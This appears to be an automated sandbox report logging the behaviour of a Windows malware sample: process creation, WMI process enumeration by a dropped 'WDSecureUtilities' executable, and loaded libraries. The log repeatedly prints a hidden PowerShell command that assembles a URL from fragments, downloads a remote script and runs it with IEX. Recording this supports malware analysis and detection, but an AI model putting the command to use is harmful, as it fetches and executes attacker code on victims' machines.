            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1528
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5836
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1084
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 652
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2804
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5388
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7972
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1504
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6240
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2360
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2788
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5804
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4184
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1060
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 772
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5904
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 512
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4072
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 620
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1048
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7512
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8016
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7076
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7068
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7060
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5332
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1452
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7224
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6184
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6772
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4888
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7040
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3960
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5744
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1864
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6604
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2724
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4900
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3708
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 552
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1844
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4084
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 980
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5288
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2268
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1836
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1404
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4848
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6140
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2560
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6568
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6996
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7252
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6940
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2236
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5252
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4388
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1364
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3948
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2652
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2220
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6528
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 492
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2644
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 916
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 484
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1772
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1340
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 476
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3492
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5644
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1332
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5640
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6068
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4772
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1636
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1752
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4336
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7180
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 856
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6092
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2172
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4756
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3892
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5612
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5180
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2592
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3020
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: DBp7mBJwqD.exeString found in binary or memory: <CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;Ljava/util/function/Supplier<TV;>;
            Source: DBp7mBJwqD.exeString found in binary or memory: <V:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/ClassLoaderValue<TV;>;TV;>;
            Source: DBp7mBJwqD.exeString found in binary or memory: t<V:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/ClassLoaderValue<TV;>;TV;>;
            Source: DBp7mBJwqD.exeString found in binary or memory: Use '-XX:-InstallSegfaultHandler' to disable the segfault handler at run time and create a core dump instead.
            Source: DBp7mBJwqD.exeString found in binary or memory: nUse '-XX:-InstallSegfaultHandler' to disable the segfault handler at run time and create a core dump instead.
            Source: DBp7mBJwqD.exeString found in binary or memory: <CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;
            Source: DBp7mBJwqD.exeString found in binary or memory: d<CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;
            Source: DBp7mBJwqD.exeString found in binary or memory: Rebuild with '-R:-InstallSegfaultHandler' to disable the handler permanently at build time.
            Source: DBp7mBJwqD.exeString found in binary or memory: [Rebuild with '-R:-InstallSegfaultHandler' to disable the handler permanently at build time.z
            Source: DBp7mBJwqD.exeString found in binary or memory: Ljdk/internal/loader/BootLoader;
            Source: DBp7mBJwqD.exeString found in binary or memory: Ljdk/internal/loader/BootLoader;
            Source: DBp7mBJwqD.exeString found in binary or memory: Africa/Addis_Ababa
            Source: DBp7mBJwqD.exeString found in binary or memory: Africa/Addis_AbabaV
            Source: DBp7mBJwqD.exeString found in binary or memory: E. Africa Standard Time:ET:Africa/Addis_Ababa:
            Source: unknownProcess created: C:\Users\user\Desktop\DBp7mBJwqD.exe "C:\Users\user\Desktop\DBp7mBJwqD.exe"
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe "C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe "C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y Jump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
